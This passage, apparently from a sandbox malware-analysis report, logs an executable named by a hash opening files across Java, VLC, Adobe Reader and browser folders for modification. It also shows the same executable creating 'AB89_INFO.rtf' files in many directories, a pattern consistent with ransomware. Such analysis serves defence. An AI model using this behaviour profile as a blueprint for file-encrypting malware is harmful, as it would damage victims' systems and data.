Files\Java\jdk1.7.0_80\jre\lib\rt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\83.0.4103.106_chrome_installer.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\83.0.4103.106_chrome_installer.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\DismountPush.xhtml 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\manifest.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\UnblockGroup.reg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 